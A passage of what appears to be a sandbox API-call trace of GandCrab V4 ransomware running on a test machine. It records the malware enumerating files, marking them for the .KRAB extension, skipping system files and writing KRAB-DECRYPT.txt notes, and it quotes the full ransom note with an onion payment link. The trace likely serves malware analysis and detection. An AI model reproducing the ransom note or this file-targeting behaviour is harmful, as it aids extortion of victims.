lpVolumeSerialNumber=0x2f30600*=0xd2ca4def, lpMaximumComponentLength=0x2f30608*=0xff, lpFileSystemFlags=0x2f30604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0060.765] wsprintfW (in: param_1=0x2ea0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\d2ca4a08d2ca4dee3d.lock") returned 91 [0060.765] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\network\\connections\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x440 [0060.767] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.768] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.769] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\") returned 68 [0060.769] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\*" [0060.769] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\*", lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 0xfbd4e0 [0060.769] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.769] FindNextFileW (in: hFindFile=0xfbd4e0, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0060.769] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0060.769] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.770] FindNextFileW (in: hFindFile=0xfbd4e0, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0060.770] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0060.770] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0060.770] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\d2ca4a08d2ca4dee3d.lock" [0060.770] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0060.856] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 96 [0060.856] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\d2ca4a08d2ca4dee3d.lock") returned 91 [0060.856] lstrlenW (lpString=".lock") returned 5 [0060.856] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0060.857] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".lock ") returned 6 [0060.857] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.857] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.857] FindNextFileW (in: hFindFile=0xfbd4e0, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0060.857] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0060.857] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0060.857] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\KRAB-DECRYPT.txt" [0060.857] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0060.858] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\KRAB-DECRYPT.txt.KRAB") returned 89 [0060.858] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\KRAB-DECRYPT.txt") returned 84 [0060.858] lstrlenW (lpString=".txt") returned 4 [0060.858] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0060.858] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".txt ") returned 5 [0060.858] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.858] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\KRAB-DECRYPT.txt") returned 84 [0060.858] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\KRAB-DECRYPT.txt") returned 84 [0060.858] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0060.858] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0060.858] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0060.858] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0060.858] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0060.858] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0060.858] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0060.858] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0060.858] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0060.858] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0060.858] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.859] FindNextFileW (in: hFindFile=0xfbd4e0, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0060.859] lstrcmpW (lpString1="Pbk", lpString2=".") returned 1 [0060.859] lstrcmpW (lpString1="Pbk", lpString2="..") returned 1 [0060.859] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\", lpString2="Pbk" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk" [0060.859] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\" [0060.859] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2ea0000 [0060.859] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0060.859] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0060.859] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0060.859] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0060.859] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.859] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0060.859] wsprintfW (in: param_1=0x2ea0200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\\\KRAB-DECRYPT.txt") returned 89 [0060.860] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\network\\connections\\pbk\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x448 [0060.861] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0060.861] WriteFile (in: hFile=0x448, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338e5a0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338e5a0*=0x1f6e, lpOverlapped=0x0) returned 1 [0060.862] CloseHandle (hObject=0x448) returned 1 [0060.862] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.862] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0060.862] GetSystemTime (in: lpSystemTime=0x2ea0400 | out: lpSystemTime=0x2ea0400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x8, wMilliseconds=0x37)) [0060.862] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0060.862] GetWindowsDirectoryW (in: lpBuffer=0x2f30000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0060.862] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f30200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f30600, lpMaximumComponentLength=0x2f30608, lpFileSystemFlags=0x2f30604, lpFileSystemNameBuffer=0x2f30400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f30600*=0xd2ca4def, lpMaximumComponentLength=0x2f30608*=0xff, lpFileSystemFlags=0x2f30604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0060.863] wsprintfW (in: param_1=0x2ea0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\d2ca4a08d2ca4dee3d.lock") returned 95 [0060.863] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\network\\connections\\pbk\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x448 [0060.863] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.863] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.863] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\") returned 72 [0060.863] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\*" [0060.863] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\*", lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 0xfbd460 [0060.863] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.863] FindNextFileW (in: hFindFile=0xfbd460, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0060.863] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0060.863] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.863] FindNextFileW (in: hFindFile=0xfbd460, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0060.863] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0060.863] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0060.863] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\d2ca4a08d2ca4dee3d.lock" [0060.864] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0060.864] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 100 [0060.864] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\d2ca4a08d2ca4dee3d.lock") returned 95 [0060.864] lstrlenW (lpString=".lock") returned 5 [0060.864] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0060.864] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".lock ") returned 6 [0060.864] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.864] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.864] FindNextFileW (in: hFindFile=0xfbd460, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0060.864] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0060.864] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0060.864] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\KRAB-DECRYPT.txt" [0060.864] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0060.865] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\KRAB-DECRYPT.txt.KRAB") returned 93 [0060.865] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\KRAB-DECRYPT.txt") returned 88 [0060.865] lstrlenW (lpString=".txt") returned 4 [0060.865] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0060.865] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".txt ") returned 5 [0060.865] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.865] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\KRAB-DECRYPT.txt") returned 88 [0060.865] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\KRAB-DECRYPT.txt") returned 88 [0060.865] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0060.865] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0060.865] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0060.865] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0060.865] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0060.865] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0060.865] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0060.865] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0060.865] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0060.865] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0060.865] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.865] FindNextFileW (in: hFindFile=0xfbd460, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0060.865] lstrcmpW (lpString1="_hiddenPbk", lpString2=".") returned 1 [0060.865] lstrcmpW (lpString1="_hiddenPbk", lpString2="..") returned 1 [0060.865] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\", lpString2="_hiddenPbk" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk" [0060.866] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\" [0060.866] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2ea0000 [0060.866] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0060.866] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0060.866] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0060.866] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0060.866] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.866] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0060.866] wsprintfW (in: param_1=0x2ea0200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\\\KRAB-DECRYPT.txt") returned 100 [0060.866] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\network\\connections\\pbk\\_hiddenpbk\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x450 [0060.867] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for 